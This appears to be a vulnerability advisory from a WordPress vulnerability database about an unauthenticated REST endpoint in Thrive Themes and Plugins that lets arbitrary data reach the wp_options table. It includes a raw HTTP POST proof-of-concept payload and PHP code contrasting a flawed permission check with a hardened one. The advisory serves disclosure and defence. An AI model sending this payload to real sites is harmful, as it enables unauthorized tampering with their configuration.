All Thrive Themes and Plugins - Unauthenticated Option Update

2021-03-24T00:00:00
ID WPVDB-ID:35ACD2D8-85FC-4AF5-8F6C-224FA7D92900
Type wpvulndb
Reporter Chloe Chamberland, Ram Gall, Charles Sweethill
Modified 2021-03-30T12:56:53

Description

The plugins and themes register a REST API endpoint associated with Zapier functionality. Although the endpoint was intended to require an API key before it could be accessed, in vulnerable versions it could be reached by supplying an empty api_key parameter whenever Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.

PoC

POST /wp-json/td/v1/optin/subscription HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

hook_url={"http:\/\/key":"maliciousfile.php"}&api_key=
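The following is an added illustration, not code from Thrive Themes or from the advisory, of the class of permission-check defect the description and PoC point at: a REST route whose API-key comparison passes when both the stored key and the supplied api_key are empty, placed beside a hardened permission callback. The option names, the example/v1 namespace, and all function names are hypothetical placeholders; that the weak version fails through an empty stored key is an assumption about this bug class, not a statement about the vendor's implementation.

```php
<?php
// Added illustration (not Thrive Themes' code). Option names, namespace and
// function names are hypothetical placeholders, not the vendor's identifiers.

// Assumed weak pattern: while the integration is disabled no key has been
// generated, so the stored option is ''. Comparing the request's api_key to
// that empty string lets a request carrying "&api_key=" through.
function example_weak_permission_check( WP_REST_Request $request ) {
    $stored   = get_option( 'example_zapier_api_key', '' );   // '' when Zapier is not enabled
    $supplied = (string) $request->get_param( 'api_key' );   // '' for "&api_key="
    return $supplied === $stored;                              // '' === '' is true
}

// Hardened: reject unless the integration is enabled, a non-empty key exists,
// the caller sent a non-empty key, and the two match in constant time.
function example_hardened_permission_check( WP_REST_Request $request ) {
    if ( ! get_option( 'example_zapier_enabled', false ) ) {
        return new WP_Error( 'rest_forbidden', 'Integration is not enabled.', array( 'status' => 403 ) );
    }
    $stored   = (string) get_option( 'example_zapier_api_key', '' );
    $supplied = (string) $request->get_param( 'api_key' );
    if ( '' === $stored || '' === $supplied || ! hash_equals( $stored, $supplied ) ) {
        return new WP_Error( 'rest_forbidden', 'Invalid API key.', array( 'status' => 403 ) );
    }
    return true;
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/optin/subscription', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'example_store_hook_url',
        'permission_callback' => 'example_hardened_permission_check',
        'args'                => array(
            'hook_url' => array(
                'required'          => true,
                'type'              => 'string',
                // Accept only a syntactically valid http(s) URL, never an
                // arbitrary structure that is written into wp_options as-is.
                'validate_callback' => function ( $value ) {
                    return is_string( $value )
                        && false !== filter_var( $value, FILTER_VALIDATE_URL )
                        && in_array( wp_parse_url( $value, PHP_URL_SCHEME ), array( 'http', 'https' ), true );
                },
                'sanitize_callback' => 'esc_url_raw',
            ),
        ),
    ) );
} );

function example_store_hook_url( WP_REST_Request $request ) {
    // Reached only after the permission callback returned true and the
    // hook_url argument passed validation and sanitization.
    update_option( 'example_zapier_hook_url', $request->get_param( 'hook_url' ) );
    return rest_ensure_response( array( 'stored' => true ) );
}
```

The two checks that matter for this bug class are the explicit rejection of an empty key on either side and the gate on the integration actually being enabled; hash_equals then prevents timing leaks on the comparison itself. Constraining hook_url to a validated URL also keeps the option from holding whatever the request body contained. Since WordPress 5.5, register_rest_route emits a notice when permission_callback is omitted, so a missing or always-true callback is worth grepping for during plugin review.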